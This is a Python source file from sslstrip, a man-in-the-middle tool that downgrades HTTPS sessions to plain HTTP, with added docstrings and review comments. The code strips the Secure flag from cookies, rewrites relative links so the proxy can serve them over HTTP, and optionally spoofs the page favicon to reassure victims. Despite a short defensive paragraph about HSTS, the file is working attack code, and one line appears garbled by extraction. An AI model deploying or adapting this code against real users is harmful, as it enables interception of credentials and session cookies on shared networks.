Path: blob/master/sslstrip-work-2019/sslstrip/SSLServerConnection.py
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging, re, string

from ServerConnection import ServerConnection


class SSLServerConnection(ServerConnection):

    '''
    Handler for responses that were fetched from the origin server over SSL.

    On top of what ServerConnection already does, this class
      * removes the "Secure" attribute from Set-Cookie header values,
      * reports every relative link found in the body to the URL monitor,
        because the origin expects those to be requested over SSL as well,
      * optionally replaces the page's favicon with a fixed local one.

    Defensive context: every URL built here starts with "http://", so the
    rewriting only matters for a client that issues plain-HTTP requests.
    A host the browser already knows through Strict-Transport-Security (or
    the HSTS preload list) is never requested that way, and browsers reject
    cookies named with the __Secure- or __Host- prefix when they arrive
    without the Secure attribute.

    NOTE(review): self.urlMonitor, self.client, self.headers and self.uri are
    not assigned in this file; presumably ServerConnection sets them - confirm.
    '''

    # Captures everything in front of a "; Secure" attribute (case-insensitive).
    cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
    # Captures the unquoted argument of a CSS url(...) reference.
    cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
    # Matches a double-quoted <link rel="shortcut icon" ... href="..."> tag.
    iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
    # Matches a/link/img/script/frame tags; group 10 is the href/src value.
    linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
    headExpression = re.compile(r"<head>", re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        '''Pass all constructor arguments straight through to ServerConnection.'''
        ServerConnection.__init__(self, command, uri, postData, headers, client)

    def getLogLevel(self):
        '''Return logging.INFO as the log level for this connection type.'''
        return logging.INFO

    def getPostPrefix(self):
        '''Return the label "SECURE POST" (presumably used when logging POST bodies).'''
        return "SECURE POST"

    def handleHeader(self, key, value):
        '''
        Hand one response header to ServerConnection.handleHeader.

        For Set-Cookie headers the "; Secure" attribute is dropped from the
        value first; all other headers are passed on unchanged.
        '''
        isCookieHeader = key.lower() == 'set-cookie'

        if isCookieHeader:
            # Keep only capture group 1, i.e. the text before "; Secure".
            value = SSLServerConnection.cookieExpression.sub(r"\g<1>", value)

        ServerConnection.handleHeader(self, key, value)

    def stripFileFromPath(self, path):
        '''Return the part of path that precedes its last "/" ("" if there is none).'''
        return path.rpartition('/')[0]

    def buildAbsoluteLink(self, link):
        '''
        Turn a relative link into an "http://" URL on the request's host and
        register it with the URL monitor for the current client IP.

        Links that start with "http" are ignored. The method returns nothing;
        its only effects are the debug log lines and the addSecureLink call.
        '''
        if link.startswith('http'):
            return

        hostPrefix = "http://" + self.headers['host']

        if link.startswith('/'):
            # Host-relative link: append directly to the host.
            resolved = hostPrefix + link

            logging.debug("Found relative link in secure transmission: " + link)
            logging.debug("New Absolute link: " + resolved)
        else:
            # Path-relative link: resolve against the directory of the request URI.
            resolved = hostPrefix + self.stripFileFromPath(self.uri) + '/' + link

            logging.debug("Found path-relative link in secure transmission: " + link)
            logging.debug("New Absolute path-relative link: " + resolved)

        # NOTE(review): as rendered on this page the call below maps '&' to
        # itself and changes nothing; an HTML entity was probably decoded when
        # the page was extracted - confirm against the upstream file.
        resolved = resolved.replace('&', '&')
        self.urlMonitor.addSecureLink(self.client.getClientIP(), resolved)

    def replaceCssLinks(self, data):
        '''
        Register every CSS url(...) target found in data via buildAbsoluteLink.

        Despite the name, data itself is returned unmodified.
        '''
        for cssMatch in SSLServerConnection.cssExpression.finditer(data):
            self.buildAbsoluteLink(cssMatch.group(1))

        return data

    def replaceFavicon(self, data):
        '''
        Point the page's shortcut icon at "/favicon-x-favicon-x.ico".

        An existing shortcut-icon <link> tag is replaced; if none is found, a
        new tag is inserted right after <head>. The fixed icon path appears
        verbatim in the returned markup, so it can serve as an indicator when
        inspecting page source delivered to a client.
        '''
        iconPattern = SSLServerConnection.iconExpression

        if iconPattern.search(data) is not None:
            return iconPattern.sub(
                "<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)

        return SSLServerConnection.headExpression.sub(
            "<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)

    def replaceSecureLinks(self, data):
        '''
        Run the full body rewrite for an SSL-fetched response and return it.

        Order: ServerConnection.replaceSecureLinks, CSS link registration, the
        favicon swap (only when urlMonitor.isFaviconSpoofing() is true), then
        registration of every href/src value matched by linkExpression.
        '''
        data = ServerConnection.replaceSecureLinks(self, data)
        data = self.replaceCssLinks(data)

        if self.urlMonitor.isFaviconSpoofing():
            data = self.replaceFavicon(data)

        for tagMatch in SSLServerConnection.linkExpression.finditer(data):
            # Group 10 holds the URL captured from the href/src attribute.
            self.buildAbsoluteLink(tagMatch.group(10))

        return data